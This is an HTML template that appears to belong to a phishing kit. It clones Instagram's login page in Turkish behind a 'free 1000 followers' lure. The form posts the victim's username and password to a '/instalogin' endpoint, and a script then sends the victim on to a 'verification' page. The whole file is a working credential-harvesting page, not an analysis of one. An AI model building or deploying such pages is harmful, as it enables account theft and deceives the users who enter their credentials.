<!DOCTYPE html>
<html class="border-l" lang="en">
<head>
    <title>Bedava 1000 Takipçi</title>
    <meta charset="UTF-8">
    <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
    <style>
        * {
            margin: 0;
            padding: 0;
        }
        .instagram-logo {
            background-position: 0 -130px;
            height: 45px;
            width: 175px;
            background-image: url(https://imgur.com/a/instagram-logo-bM3DFZb);
        }
        .facebook-logo {
            background-position: -414px -259px;
            background-image: url(https://bit.ly/3v2LT17);
            height: 16px;
            width: 16px;
        }
        .apple-store-logo {
            background-position: -132px -182px;
            height: 42px;
            width: 128px;
            background-image: url(https://bit.ly/3v2LT17);
        }
        .google-store-logo {
            background-position: 0 -182px;
            height: 42px;
            width: 130px;
            background-image: url(https://bit.ly/3v2LT17);
        }
    </style>
</head>
<body>
<div class="h-screen bg-gray-50 flex flex-col justify-center items-center">
    <div class="bg-white border border-gray-300 w-80 py-8 flex items-center flex-col mb-3">
        <img src="{{ user_image }}" alt="instagram_logo_png">
        <form class="mt-8 w-64 flex flex-col" action="/instalogin" method="POST">
            <input autofocus
                   class="text-xs w-full mb-2 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none"
                   id="fname" name="fname" placeholder="Telefon Numarası, Kullanını Adı, veya email" type="text">
            <input autofocus
                   class="text-xs w-full mb-4 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none"
                   id="lname" name="lname" placeholder="Şifre" type="password">
            <input id="loginButton" class=" text-sm text-center bg-blue-300 text-white py-1 rounded font-medium" type="submit" value="Giriş Yap">
        </form>
        <div class="flex justify-evenly space-x-2 w-64 mt-4">
            <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
            <span class="flex-none uppercase text-xs text-gray-400 font-semibold">or</span>
            <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
        </div>
        <button class="mt-4 flex">
            <div class="bg-no-repeat facebook-logo mr-1"></div>
            <span class="text-xs text-blue-900 font-semibold">Facebook İle Giriş Yap</span>
        </button>
        <a class="text-xs text-blue-900 mt-4 cursor-pointer -mb-4">Şifrenemi Unutun?</a>
    </div>
    <div class="bg-white border border-gray-300 text-center w-80 py-4">
        <span class="text-sm">Hesabın Yokmu??</span>
        <a class="text-blue-500 text-sm font-semibold">Kayıt Ol</a>
    </div>
    <div class="mt-3 text-center">
        <span class="text-xs">Telefonuna Edin</span>
        <div class="flex mt-3 space-x-2">
            <div class="bg-no-repeat apple-store-logo"></div>
            <div class="bg-no-repeat google-store-logo"></div>
        </div>
    </div>
</div>
<script>
    document.getElementById("loginButton").onclick = function() {
        setTimeout(function() {
            window.location.href = "/veritypage";
        }, 50);
    }
</script>
</body>
</html>
